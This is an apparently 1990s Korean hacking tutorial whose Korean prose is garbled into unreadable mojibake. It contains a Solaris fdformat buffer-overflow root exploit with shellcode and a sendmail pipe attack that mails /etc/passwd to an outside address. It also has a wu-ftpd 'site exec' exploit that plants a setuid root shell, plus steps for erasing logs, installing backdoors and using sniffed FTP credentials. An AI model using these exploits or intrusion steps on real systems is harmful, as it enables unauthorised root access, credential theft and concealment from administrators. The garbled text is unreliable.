¹öÆÛ ¿À¹öÇ÷οì´Â 1988³â Àü¼¼°è¸¦ ¶°µé¼®ÇÏ°Ô ¸¸µé¾ú´ø Morris Worm »ç°Ç¿¡¼­ÀÇ finger daemonÀ» ÀÌ¿ëÇÑ °ø°ÝÀÌ ½ÃÃʶó°í ¸»ÇÒ ¼ö ÀÖ´Ù. ÇÏÁö¸¸ °ú°Å ÀÌ¿¡ ´ëÇÑ ±â¼úÀû Áö½ÄÀÌ ºÎÁ·Çß´øÅͶó Àß ¾Ë·ÁÁöÁö ¾Ê¾ÒÀ¸³ª 1997³â Phrack ÀâÁö 49È£¿¡ ½Ç¸° AlephÀÇ ¡°Smashing the Stack for Fun and Profit¡± À̶ó´Â ±â»ç¿¡¼­ ÀÌ ¹öÆÛ ¿À¹öÇ÷ο쿡 ´ëÇÑ ÀÚ¼¼ÇÑ ¿ø¸®¿Í Á¦ÀÛ ¹æ¹ýÀÌ ¼Ò°³µÇ¸é¼­ Áö±Ý ±îÁöµµ ¸¹Àº ¾çÀÇ ¹öÆÛ ¿À¹öÇÃ·Î¿ì °ø°Ý¹æ¹ýÀÌ »ý°Ü³ª°í ÀÖ´Ù.

¿ø¸®¸¦ °£´ÜÈ÷ »ìÆ캸ÀÚ¸é :
¸Þ¸ð¸®ÀÇ ½ºÅÿµ¿ªÀ» ³ÑÃÄÈ帣°Ô Çؼ­ ¸®ÅϵǴ ÁÖ¼ÒÁö¸¦ º¯°æÇÏ¿© ¿øÇÏ´Â ÀÓÀÇÀÇ ¸í·É¾î¸¦ ½ÇÇà½ÃŲ´Ù´Â ±×·± ¸»¾¸.. ( »ç½Ç ¿ø¹®À» ÀÚ¼¼ÇÏ°Ô À̾߱âÇÏÀÚ¸é ¿©·¯ºÐµéÀÌ ÀÌÇظ¦ ¸øÇÒ·±Áöµµ ¸ð¸¥´Ù. ÀÌ Á¤µµ¸¸ ¾Ë°í Àֱ⸦... - ±×·¡µµ ³»°¡ ÇÑ ¸»ÀÌ ÇÙ½ÉÀÌ´Ù! ÇÙ½É!!)

À̹ø¿£ ¹öÆÛ ¿À¹öÇ÷ο츦 ÀÏÀ¸Å°´Â ÇÁ·Î±×·¥À» Çϳª »ìÆ캼±î?
fdformatÆÄÀÏÀº µð½ºÅ©³ª  PCMCIA ¸Þ¸ð¸® Ä«µå¸¦ Æ÷¸ä½Ãų¶§ »ç¿ëÇÏ´Â À¯Æ¿¸®Æ¼ÀÌ´Ù.
Àμö äũ¸¦ ÇÏÁö ¾Ê¾Æ¼­ »ý±ä ¹ö±×ÀÌ´Ù.

/*
Solaris 2.5.1 - this exploited was compiled on Solaris2.4 and tested on 2.5.1
*/ # ¼Ö¶ó¸®½º 2.4 ~ 2.5.1 ±îÁöÀÇ °ø°ÝÄÚµå

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH 364
#define EXTRA 400
#define STACK_OFFSET 704
#define SPARC_NOP 0xa61cc013

# ÀÌ ºÎºÐÀÌ ¹Ù·Î root shellÀ» ¾ò¾î³»´Âµ¥ ÇÙ½ÉÀÎ ½© ÄÚµå
# ºÎºÐÀÌ´Ù.
u_char sparc_shellcode[] =
¡°¡¬x2d¡¬x0b¡¬xd8¡¬x9a¡¬xac¡¬x15¡¬xa1¡¬x6e¡¬x2f¡¬x0b¡¬xda¡¬xdc¡¬xae¡¬x15¡¬xe3¡¬x68¡± ............. # ½© ÄÚµå µÎ ÁÙ »èÁ¦
...................
¡°¡¬x82¡¬x10¡¬x20¡¬x3b¡¬x91¡¬xd0¡¬x20¡¬x08¡¬x90¡¬x1b¡¬xc0¡¬x0f¡¬x82¡¬x10¡¬x20¡¬x01¡±
¡°¡¬x91¡¬xd0¡¬x20¡¬x08¡±;

u_long get_sp(void)
{
__asm__(¡°mov %sp,%i0 ¡¬n¡±);
}

void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA + 8];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0;

if(argc > 1) dso=atoi(argv[1]);

long_p =(u_long *) buf ;
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;

char_p = (u_char *) long_p;

for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];

long_p = (u_long *) char_p;

for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;

printf(¡°Jumping to address 0x%lx B[%d] E[%d] SO[%d]¡¬n¡±,
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl(¡°/bin/fdformat¡±, ¡°fdformat¡±, & buf[1],(char *) 0);
perror(¡°execl failed¡±);
} # Àß ¸ð¸£°Ú´Ù¸é À¯´Ð½º ÇÁ·Î±×·¡¹ÖÀ» ¹è¿ìÀÚ.. (³ªµÎ.. ³ªµÎ.. --;)

°£´ÜÈ÷ ÄÄÆÄÀÏ ½ÃÅ°°í ½ÇÇàÀ» ½ÃÅ°ÀÚ¸é

% gcc -o fdformat fdformat.c
% ./fdformat
.....
...
# whoami
root

ÆÐÄ¡°¡ µÇ¾îÀÖ´Ù¸é ´ç¿¬È÷ ¾È ¸ÔÈú °ÍÀÌ°í....

ÀÌ Á¤µµ·Î  Local attack¿¡ °üÇÑ À̾߱⸦ ¸¶¹«¸® ÁöÀ»±î ÇÑ´Ù. ´ëÃæ.. ¾Æ~ ÀÌ·¸°Ô Çϴ±¸³ª.. ÀÌ·± ¹æ½ÄÀ¸·Î °ø°ÝÇϴ±¸³ª... ÀÌ Á¤µµ¸¸ ¾Ë¾ÆµÎ°í ³Ñ¾î°¡ÀÚ.

3. Remote attack

À§¿¡¼­ ¸®¸ðÆ® °ø°Ý¿¡ °üÇÏ¿© ´ëÃæ µé¾úÀ» °ÍÀÌ´Ù. ¹Ù·Î °ø°Ý¿¡ µé¾î°¡ÀÚ~ µ¹Áø!

- ¼¾µå¸ÞÀÏ ¹ö±×
¸®¸ðÆ® °ø°ÝÀÇ ´ëÇ¥ÀûÀÎ ÁÖÀÚ´Â ¹Ù·Î ÀÌ Sendmail ÀÏ °ÍÀÌ´Ù. ÇÁ·Î±×·¥ÀÇ Å©±â°¡ ´Ù¸¥°Í º¸´Ù ¹«Ã´ Å©±â ¶§¹®¿¡ ±× ¸¸Å­ ¹ö±×°¡  ¸¹ÀÌ Á¸ÀçÇÑ´Ù. (local bugµµ ¹«Ã´ ¸¹´Ù...)

ÀÌ ¹æ¹ýÀº ¸î ³â Àü SunOs 4.1.x´ëÀÇ sendmail ¹öÀü 4.1¿¡¼­ À¯ÇàÇß´ø ¹ö±×ÀÌ´Ù. ±×·³ ¿ª½Ã³ª ÂùÂùÈ÷ »ìÆ캸µµ·Ï ÇÏÀÚ.

% telnet salsari.org 25 # smtp Æ÷Æ®·Î ÅÚ³ÝÇØ µé¾î°£´Ù.
Trying 255.255.255.255 ...
Connetcted to salsari.org. # Á¢¼ÓµÇ¾ú´Ù.
Escape character is ¡®^]¡¯ # ¸¸¾à ºüÁ®³ª°¡°í ½Í´Ù¸é Ctrl + ] ´­·¯¶ó.

220 salsari.org Sendmail 4.1/SMI-4.1 ready at Wed, 6 Mar 99 01:59:21 KST
# ¼¾µå¸ÞÀÏ ¹öÁ¯È®ÀÎ

mail from:¡±|/bin/mail salsari@hotmail.com < /etc/passwd¡±
# salsari@hotmail·Î /etc/passwdÆÄÀÏÀ» º¸³»¶ó´Â ¸í·É - ÆÄÀÌÇÁ(|) ¹ö±× ÀÌ¿ë
# from ÀԷ¿¡¼­ ÆÄÀÌÇÁ ÀÌÈÄ ¸í·É¾î°¡ ½ÇÇà°¡´ÉÇÏ°Ô µÇ¾îÀÖ´Ù.

250 ¡°|/bin/mail salsari@hotmail.com < /etc/passwd¡±... Sender ok # µ¥¸óÀº ÀÔ·Â ¹Þ¾Ò´Ù.

rcpt to : root # ¹Þ´Â »ç¶÷  root
250 root... Recipient ok # µ¥¸óÀÌ ¸»ÇÏ±æ ¡°¾Ë°Ú¾î¡±
data # º¸³¾ ³»¿ë ÀÛ¼º
354 Enter mail, end with ¡°.¡± on a line by inself
babo... # ¹Ùº¸... -_- (¾Æ¹«³»¿ëÀ̳ª Áý¾î ³Ö´Â´Ù.)
# . À» ÂïÀ¸¸é ³»¿ë ÀÛ¼ºÀ» ¸¶Ä£´Ù.
250 Mail accepted
quit # ºüÁ®³ª°¡ÀÚ.
221 salsari.org delivering mail
Connection closed by foreign host.

# Á¢¼ÓÀº ²÷¾îÁö°í ÀÌÁ¦ Æнº¿öµå ÆÄÀϸ¸ ÀÚ½ÅÀÇ E-mail·Î ¿À±â¸¦ ±â´Ù¸®¸é µÈ´Ù.

ÀÌ·¸°Ô ¾òÀº Æнº¿öµå ÆÄÀÏÀ» Å©·¢ÇØ (Àç¼ö ÁÁÀ¸¸é root Æнº¿öµåµµ ¾òÀ» ¼ö ÀÖ´Ù.) local·Î Á¢¼ÓÇÑµÚ localÀÇ ¼ö¸¹Àº ¹ö±×¸¦ ÀÌ¿ëÇÏ¿© root¸¦ ¾òÀ¸¸é µÇ´Â °ÍÀÌ´Ù.

±×·³ Á¶±Ý ÃÖ±ÙÀÇ wu-ftp 2.4 ¹öÀüÀÇ ¹ö±×¸¦ »ìÆ캸ÀÚ.
ÀÌ ¹ö±×´Â site exec ¸í·É¾î¸¦ ¼öÇàÇÒ ¼ö À־ ½±°Ô root shellÀ» ¾òÀ» ¼ö ÀÖ´Ù.  

COMMAND
wu.ftpd(8)

SYSTEMS AFFECTED
Sites running wuarchive ftpd versions prior to 2.3 or running
¡°wrl¡± ftpd version ??

PROBLEM: # site exec ¸í·É¾î´Â ftp¿¡¼­ ½© ¸í·É¾î¸¦ ½ÇÇà½Ãų¼ö ÀÖ´Ù.

Compile program : # °ø°Ý ¼Ò½º - ¸¸µé°í ³ª¼­ ÄÄÆÄÀÏ ½ÃÅ°ÀÚ.
# ÄÄÆÄÀÏ : cc -o ftpbug ftpbug.c
#include < stdio.h>
#include < stdlib.h>
#include < unistd.h>

main()
{
seteuid (0);
system (¡°cp /bin/sh /tmp/.sh¡±);
system (¡°chmod 6777 /tmp/.sh¡±);
}

Login to the system : # ÄÄÆÄÀÏ ½ÃÄ×À¸¸é ftp·Î Á¢¼Ó

220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready.
Name (exploitablesys:root): goodaccount # ÀÚ½ÅÀÇ user name ÀÔ·Â
331 Password required for goodaccount.
Password: (password) # password ÀÔ·Â
230 User goodaccount logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

See if system is exploitable : # ftp bug°¡ Á¸ÀçÇÏ´ÂÁö testÇÑ´Ù.

ftp> quote ¡°site exec bash -c id¡± # ÀÌ ¸í·É¾î¸¦ ÀÔ·ÂÇßÀ»¶§...
200-bash -c id # id ¸í·É¾î¸¦ ½ÇÇà
200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
200 (end of ¡®bash -c id¡¯) # °á°ú°¡ ÀÌ·¸°Ô ³ªÅ¸³­´Ù¸é °ø°Ý´ë»óÀÌ´Ù.

Exploit system : # test°¡ ¼º°øÀ̶ó¸é ½ÇÁ¦ÀûÀ¸·Î °ø°ÝÇÏÀÚ.

# ¸¸µé¾î µÎ¾ú´ø °ø°ÝÄڵ带 ½ÇÇà½ÃÅ°¸é root ±ÇÇÑÀ» ¾òÀ»
# ¼ö ÀÖ´Â .sh ÆÄÀÏÀÌ  /tmp/.sh ¿¡ »ý¼ºµÈ´Ù.
ftp> quote ¡°site exec bash -c /yer/home/dir/ftpbug¡±
200-bash -c /yer/home/dir/ftpbug
200 (end of ¡®bash -c /yer/home/dir/ftpbug¡¯)
ftp> quit # ½ÇÇà ½ÃÄ×À¸´Ï ÀÌÁ¦ ºüÁ®³ª°¡ÀÚ.
221 Goodbye. # ±×¸®°í /tmp/.sh½ÇÇà!!!! ¿©·¯ºÐµéÀº ÀÌÁ¦ºÎÅÍ root´Ù!!!

remote attackÀÇ µÎ ¿¹¸¦ »ìÆ캸¾ÒÁö¸¸ µÎ °¡Áö ´Ù À߸øµÈ ¼³Á¤À¸·Î ¸¸µé¾îÁø holeÀÌ´Ù. ÀÌ·±°Íµé ¸»°í daemonÀÌ °¡Áö°í ÀÖ´Â ¹ö±×¿¡ ÀÇÇÑ buffer overflow°¡ ÀÖ´Ù. ´ëÇ¥ÀûÀÎ °ÍÀÌ ÃÖ±Ù¿¡ ³ª¿Â wu-ftp 2.4.2 ¹öÀü´ëÀÇ remote buffer overflowÀÌ´Ù.

 

4. ÃÖ±Ù ¹ö±×µé

- linux
Linux_INN - ·¹µåÇò ¸®´ª½º 6.0 INN Ãë¾àÁ¡ ¹× ´ëÃ¥
Linux_pop2d - pop2d Ãë¾àÁ¡ ¹× ´ëÃ¥
Linux super buffer overflow - super ¹öÆÛ ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥

- sun / solaris
SUN-automountd - SUN automountd Ãë¾àÁ¡
SUN-passwd - Sun passwd ¼­ºñ½º °ÅºÎ Ãë¾àÁ¡ ¹× ´ëÃ¥
Sun man/catman - Sun man/catman Ãë¾àÁ¡ ¹× ´ëÃ¥
Sun CDE - Sun CDE Ãë¾àÁ¡ ¹× ´ëÃ¥
SUN sdtcm_convert - sdtcm_convert Ãë¾àÁ¡ ¹× ´ëÃ¥
Solaris_libc - ¼Ö¶ó¸®½º libc Ãë¾àÁ¡ ¹× ´ëÃ¥

- HP/UX
HP sendmail DOS - HP Sendmail DOS Ãë¾àÁ¡ ¹× ´ëÃ¥
HP_ftp - HP-UX ftp Ãë¾àÁ¡ ¹× ´ëÃ¥
HP CDE ttsession - HP CDE ttsession Ãë¾àÁ¡ ¹× ´ëÃ¥

- AIX
AIX Vulnerability in ptrace() system call - AIX ptrace() ½Ã½ºÅÛ ÄÝÀÇ ¼­ºñ½º°ÅºÎ°ø°Ý Ãë¾àÁ¡
AIX named-xfer security problem - AIX named-xfer º¸¾È Ãë¾àÁ¡ ¹× ´ëÃ¥
AIX pdnsd buffer overflow - IBM AIX pdnsd ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥

- IRIX
IRIX X server path - IRIX X server path Ãë¾àÁ¡ ¹× ´ëÃ¥
IRIX_midikeys - IRIX midikeys Ãë¾àÁ¡ ¹× ´ëÃ¥

- DOS
tcp-denial-of-service - TCP/IP ¼­ºñ½º °ÅºÎ Ãë¾àÁ¡ ¹× ´ëÃ¥
Using the Domain Name System DoS attack - µµ¸ÞÀγ×ÀÓ ½Ã½ºÅÛÀ» ÀÌ¿ëÇÑ ¼­ºñ½º°ÅºÎ(DoS)°ø°Ý

- trojan / virus
Trojan Tcp Wrapper - Æ®·ÎÀ̸ñ¸¶ ¹öÀüÀÇ TCP Wrapper
Melissa-Macro-Virus - Melissa ¸ÅÅ©·Î ¹ÙÀÌ·¯½º
CIH-Virus - CIH ¹ÙÀÌ·¯½º

- FTP
FTP-buffer overflows - FTP Buffer Overflows Ãë¾àÁ¡°ú ´ëÃ¥
Remote buffer overflow in ftpd daemon.
ProFTPD 1.2.0pre1 ÀÌÀü ¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½
wu-ftpd 2.4.2(beta 18)±îÁöÀÇ ¸ðµç ¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½
wu-ftpd VR series - 2.4.2(beta 18) VR10 ÀÌÀü ¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½
BeroFTPD 1.2.0 ÀÌÀü ¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½
NcFTPd 2.3.4 ÀÌÀü ¹öÀüÀº Ãë¾àÁ¡À» °¡Áö°í ÀÖÀ½
Crashing FTP Serv-U 2.5 - FTP Serv-U 2.5 Ãë¾àÁ¡ ¹× ´ëÃ¥

- ETC
lsof buffer boverflow - lsof ¹öÆÛ ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥
umapfs - umapfs Ãë¾àÁ¡ ¹× ´ëÃ¥
cmsd-Buffer Overflow - Calendar Manager ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥
Accelerated-X Overflow - Accelerated-X X¼­¹ö Ãë¾àÁ¡ ¹× ´ëÃ¥
Tiger vulnerability - Tiger Ãë¾àÁ¡ ¹× ´ëÃ¥
amd buffer overflow vulnerability - amd ¿ø°Ý ¹öÆÛ¿À¹öÇ÷οì Ãë¾àÁ¡ ¹× ´ëÃ¥

 

5. ÇØÄ¿µéÀÇ ÇØÅ· ¹æ¹ý·Ð

¿©·¯ºÐµéÀº À§¿¡¼­ Local host ¿¡¼­ root¸¦ ¾ò´Â ¹æ¹ý°ú Remote host¿¡¼­ root¸¦ ÃëÇÏ´Â ¹æ¹ýÀ» º¸¾ÒÀ» °ÍÀÌ´Ù. ÇÏÁö¸¸ ÀÌ·± ¹æ¹ýµéÀº Áö±ØÈ÷ ±Ø´ÜÀûÀÎ ¹æ¹ýÀ̶ó°í º¼ ¼ö ÀÖ´Ù. ±×·³ ÇØÄ¿µéÀÌ ÇϳªÀÇ ½Ã½ºÅÛÀ» ÇØÅ·Çϱâ À§Çؼ­ ¾î¶² ¼ø¼­¸¦ °ÅÃļ­ ¾î¶»°Ô ÇØÅ·ÇÏ¿© root¸¦ ÃëÇÏ´ÂÁö ¾Ë¾Æº¼ ÇÊ¿ä°¡ ÀÖ´Ù.

5.1 Á¤º¸¼öÁý


¿ì¼± ¿©·¯ºÐµéÀÌ »ç¿ëÇÏ´Â ½Ã½ºÅÛÀ» A, °ø°Ý ¸ñÇ¥°¡ B¶ó°í ÇÑ´Ù¸é B¿¡ °ü·ÃµÈ Á¤º¸¸¦ ¼öÁýÇØ¾ß ÇÒ °ÍÀÌ´Ù. ¹°·Ð B¿¡ ¿©·¯ºÐµéÀÌ »ç¿ëÇÏ´Â °èÁ¤À̳ª ȤÀº ¾Æ´Â °èÁ¤ÀÌ ÀÖ´Ù¸é ÀÏÀº ½¬¿öÁö°ÚÁö¸¸ ±×·¸Áö ¾Ê´Ù°í ÇßÀ» °æ¿ì ¾î¶»°Ô Çؼ­µç B¿¡ ħÅõÇؾ߸¸ ÇÑ´Ù. ( ¿Ö³Ä¸é remote bug¿¡ ºñÇØ local bug°¡ ¹«±Ã¹«Áø Çϰŵ¢... remote bug¸¦ ÀÌ¿ëÇؼ­ root°¡ µÇ¸é ´õ ÁÁ°í... )
±×·²·Á¸é finger³ª smtp, rusers, rpcinfo µî°ú °°Àº °ÍÀ¸·Î »ç¿ëÇÒ ¸¸ÇÑ °èÁ¤Àº ¾ø´ÂÁö ȤÀº remote bug´Â °¡Áö°í ÀÖÁö ¾ÊÀ»±î¸¦ »ìÆ캸°Ô µÈ´Ù. bugµéÀ» ¿©·¯ºÐµé¿¡°Ô ÀÚµ¿À¸·Î ¾Ë·ÁÁÖ´Â remote bug scan ÇÁ·Î±×·¥µéÀÌ Àֱ⵵ ÇÏ´Ù. sscanÀ̳ª mscan µîÀÌ ±× ´ëÇ¥ÀûÀÎ ¿¹ ÀÌ´Ù. ±×¸®°í °ü¸®ÀÚÀÇ ÆÐÅϵµ ¾Ë¾Æ¾ß ÇÑ´Ù. ¾î¶² ½Ã°£´ë¿¡ Á¢¼ÓÀ» ÇÏ¿© ÀÛ¾÷À» Çϴ°¡? °ü¸®ÀÚ°¡ root°¡ ¾Æ´Ñ ¾î¶² ·Î±×Àθí(°èÁ¤)À» »ç¿ëÇϴ°¡? ¶Ç rootÀÇ idle timeÀÌ ¾î´ÀÁ¤µµÀΰ¡? (root°¡ idle timeÀÌ ¸¹À» ¼ö·Ï °ÔÀ¸¸¥ °ü¸®ÀÚ°¡ ½Ã½ºÅÛÀ» °ü¸®ÇÑ´Ù°í º¼ ¼ö ÀÖ´Ù.)
½Ã½ºÅÛ¿¡ °ü·ÃµÈ Á¤º¸¸¦ ¼öÁýÇßÀ¸¸é ±¸Ã¼ÀûÀÎ °èȹÀ» ¼ö¸³ÇØ¾ß ÇÑ´Ù.

5.2 °èȹ ¼ö¸³
¾î¶² ¹æ¹ýÀ¸·Î °¥ °ÍÀΰ¡?

- B¿¡ root¸¦ ȹµæ ÇÒ ¼ö ÀÖ´Â remote bug°¡ ÀÖ¾î ¹Ù·Î root°¡ µÉ °ÍÀΰ¡?
- A¿¡¼­ root ±ÇÇÑÀ» µý ÈÄ root ±ÇÇÑÀ» ÀÌ¿ëÇÏ¿© BÀÇ °èÁ¤À» ¾òÀ» °ÍÀΰ¡?
- B¿¡ Ãë¾àÇÑ °èÁ¤ÀÌ ÀÖ¾î ±×°÷À¸·Î ħÅõÇÒ °ÍÀΰ¡?
- cgi bug µîÀ» ÀÌ¿ëÇؼ­ ¾òÀº passwd ÆÄÀÏÀ» Å©·¢ ÇÒ °ÍÀΰ¡?

root ·Î ¹Ù·Î ħÅõÇß´Ù¸é
- log Á¤º¸¸¦ ¾ø¾Ö°í backdoor¸¦ ¼³Ä¡ÇÒ °Í¿¡ °ü·ÃµÈ »çÇ×
   user ·Î ħÅõÇß´Ù¸é
- BÀÇ local bug¸¦ ã´Â´Ù. ±×¸®°í root±ÇÇÑÀ» ¾ò´Â´Ù.
- log Á¤º¸¸¦ ¾ø¾Ö°í ½±°Ô µé¾î ¿Ã ¼ö ÀÖµµ·Ï backdoor¸¦ ¼³Ä¡ÇÑ´Ù.

ÀÚ, °èȹÀ» ¼ö¸³ÇÏ¿© Â÷·Ê´ë·Î Á¤¸®Çߴ°¡?

5.3 Remote attack
Remote attackÀ» ½ÇÇàÇÑ´Ù. ±×°ÍÀÌ root¸¦ ¾òµç ÀÏ¹Ý user ±ÇÇÑÀ» ¾òµç ¿ì¼± B¿¡ ħÅõÇÏÀÚ!

5.4 Local attack
local bug·Î root¸¦ µû³»ÀÚ.

5.5 ÈçÀû ¾ø¾Ö±â
ħÅõ¿¡ ¼º°øÇß´Ù¸é ±×¸®°í root ±ÇÇÑÀ» ¾ò¾ú´Ù¸é ÈçÀûÀ» ³²°åÀ» °ÍÀÌ´Ù. last ¸í·ÉÀ̳ª /var/adm(log)/messages, /var/adm/utmp /var/adm/wtmp µî.. »ìÆ캸¸é ÈçÀûµéÀÌ ³²¾Æ ÀÖÀ» °ÍÀε¥ ÀÌ ÈçÀûµéÀ» Áãµµ »õµµ ¸ð¸£°Ô ¾Æ¹«·± º¯È­¾øÀÌ »èÁ¦Çؾ߸¸ ÇÑ´Ù.

5.6 backdoor ¼³Ä¡
¿©·¯ºÐµéÀÌ ´Ù½Ã B ½Ã½ºÅÛ¿¡ Á¢¼ÓÇϱâ À§Çؼ­ ¶Ç ´Ù½Ã ÇØÅ·À» Çؾ߸¸ ÇÒ±î? ¾Æ´Ï´Ù. backdoor ¶ó´Â °ÍÀÌ ÀÖÁö ¾ÊÀº°¡? backdoor(µÞ¹®)´Â ½Ã½ºÅÛ ÇØÅ· ÈÄ ´Ù½Ã ±× ½Ã½ºÅÛ¿¡ µé¾î ¿Ã ¶§ ½±°Ô µé¾î¿À±â À§ÇÑ ÇϳªÀÇ ¹æ¹ýÀÌ´Ù. ¹éµµ¾îÀÇ Á¾·ù´Â »ó´çÈ÷ ¸¹´Ù. ÀÚ¼¼ÇÑ °ÍÀº 6.4.5 ¿¡¼­ »ìÆ캸ÀÚ.

5.7 ±×¸®°í Áñ±â±â
¸¶À½²¯ ¶Ù¾î ³îÀÚ. °ü¸®ÀÚµéÀ» °ü¸®Çغ¸°í ³» ½Ã½ºÅÛó·³ °¡Áö°í ³îÀÚ. ´Ù¸¸ ½Ã½ºÅÛ¿¡ ÇÇÇظ¦ ÀÔÈ÷´Â ÇàÀ§´Â ÇÏÁö ¸»ÀÚ. ±×°ÍÀº Å©·¡Ä¿µéÀÇ ÇàÀ§ÀÌ´Ù. Á¶¿ëÈ÷ Á¶¿ëÈ÷ ¾Æ¹«µµ ¸ð¸£°Ô °¡Áö°í ³îÀÚ. ÀØÁö ¾Ê±â¸¦...

 

6. ±×¿Ü ÇØÅ· ±â¼úµé.

6.1 packet sniffing

sniffer¶õ ³×Æ®¿÷ »ó¿¡ µ¹¾Æ´Ù´Ï´Â ÆÐŶÀ» Àâ´Â ÇÁ·Î±×·¥ÀÌ´Ù. ¿ø·¡ ¿ëµµ´Â ³×Æ®¿÷ µð¹ö±ë ÀÛ¾÷À̾úÀ¸³ª, º¸¾ÈÅøÀÌ °ð ÇØÅ·ÅøÀ̵íÀÌ °ð ¹Ù·Î ÇØÄ¿µéÀÇ »ç¶ûÀ» ¹Þ¾Ò´Ù. ÀÌ´õ³ÝÀÇ °æ¿ì È£½ºÆ® A¿¡¼­ È£½ºÆ® B·Î ÆÐŶÀ» º¸³¾¶§´Â broadcast¹æ½ÄÀ¸·Î ÆÐŶÀ» ÀÌ´õ³Ý Àüü¿¡´Ù°¡ »Ñ¸®°Ô µÈ´Ù. ±×·³ ÁöÁ¤µÈ ÁÖ¼Ò¸¦ °¡Áø È£½ºÆ®´Â ±× ÆÐŶÀ» Àâ°í ±× ¿Ü È£½ºÆ®´Â Àڽſ¡°Ô ¿À´Â ÆÐŶÀÌ ¾Æ´Ï¹Ç·Î ¹«½ÃÇÏ°Ô µÈ´Ù. ±×·³ ´ëÃæ ÀÌÇØ°¡ °¡¸®¶ó º»´Ù. ±× ¹«½ÃµÇ´Â ÆÐŶÀ» ¹«½ÃÇÏÁö ¾Ê°í ó¸®Çعö¸®¸é ¾î¶³±î? ¿©±â¼­ sniffingÀÌ Åº»ýÇÏ°Ô µÇ¾ú´Ù.

 

-- TCP/IP LOG -- TM: Tue Feb 15 17:04:55 -- PATH: salsari.org(1953) => jungmin.org(ftp) STAT: Sun Apr 14 18:09:23, 14 pkts, 49 bytes [TH_FIN] DATA: USER salsari : : PASS jungminlove : : CWD backup : : NLST : : QUIT : --

 

6.2 Spoofing

- IP spoofing
TCP/IP ÇÁ·ÎÅäÄÝÀÇ °áÇÔÀ» ÀÌ¿ëÇØ ½Å·Ú°ü°è¿¡ Àִ ȣ½ºÆ®ÀÇ ip·Î À§ÀåÇØ Ä§ÅõÇÏ´Â °ø°Ý ¹æ¹ýÀ» ip spoofingÀ̶ó ÇÑ´Ù. ÀÌ °áÇÔ¿¡ ´ëÇؼ­´Â 1985³â¿¡ ·Î¹öÆ® ¸ð¸®½ºÀÇ ³í¹® ¡°A Weakness in the 4.2 BSD UNIX TCP/IP Software¡±¿¡ ¾ð±ÞµÇ¾ú°í 1995³â À¯¸íÇÑ ÇØÄ¿ Äɺó¹ÌÆ®´ÐÀÌ ÀÌ ÀÌ·ÐÀ» ½ÇÁ¦È­ÇÏ¿© »ç¿ëÇÏ¿´´Ù.

> ¿©±â¼­ Àá±ñ!!
R commands(rlogin. rsh, rcp)
ÀÌµé ¸í·É¾î´Â ´ë»ó ½Ã½ºÅÛÀÇ $HOME/.rhostsÀÇ ³»¿ëÀ» ÂüÁ¶ÇÏ¿© ¾Æ¹« ÀÎÁõ¾øÀÌ È¨µð·ºÅ丮¿¡ Á¢±ÙÇÏ´Â ¸í·É¾îÀÌ´Ù. ¹Ù·Î ½Å·Ú°ü°èÀÇ ´ë¸í»ç¶ó°í³ª ÇÒ±î?

- DNS spoofing
DNS ¼­¹ö¸¦ DOS °ø°ÝÀ¸·Î ¹«·ÂÈ­½ÃÅ°°í È£½ºÆ® ³×ÀÓÀ» ±âÁØÀ¸·Î ÀÎÁõ°úÁ¤À» °ÅÄ¡´Â Ÿ°Ù È£½ºÆ®·Î ÇÏ¿©±Ý ÇØÄ¿ÀÇ È£½ºÆ®¸¦ ¹Ï°Ô²û DNS Á¤º¸¸¦ º¸³»¾î rlogin, rsh °ú °°Àº ¸í·ÉÀ» ÀÌ¿ëÇÏ´Â °ø°Ý¹ý.

- Web spoofing
Web »ó¿¡¼­ °ø°Ý ´ë»ó Web »çÀÌƮó·³ Èä³»³»¾î Á¤º¸¸¦ »©³»°¡´Â ¹æ½Ä

6.3 IP hijacking
TCP ÇÁ·ÎÅäÄÝÀÇ Ãë¾à¼ºÀÇ ÇϳªÀÎ ¸®´ÙÀÌ·º¼ÇÀ» ÀÌ¿ëÇØ ½Ö¹æÇâ È£½ºÆ® »çÀÌ¿¡ Connect°¡ µÇ¾î ÀÖ´Â »óŸ¦ »ìÇÇ°í ÀÖ´Ù°¡ Áß°£¿¡ ³¢¾îµå´Â ¹æ½ÄÀ» hijacking À̶óÇÑ´Ù.  SKEY¿Í °°Àº ÀÏȸ¿ë Æнº¿öµå³ª Kerberos¿Í °°Àº Ÿ°Ù ±â¹Ý ÀÎÁõ ½Ã½ºÅÛ¿¡ ÀÇÇØ Á¦°øµÇ´Â º¸È£ ¸ÞÄ¿´ÏÁòÀ» ¿ìȸÇÏ¿© ħÅõÇÒ ¼ö ÀÖ´Ù.

6.4 DOS
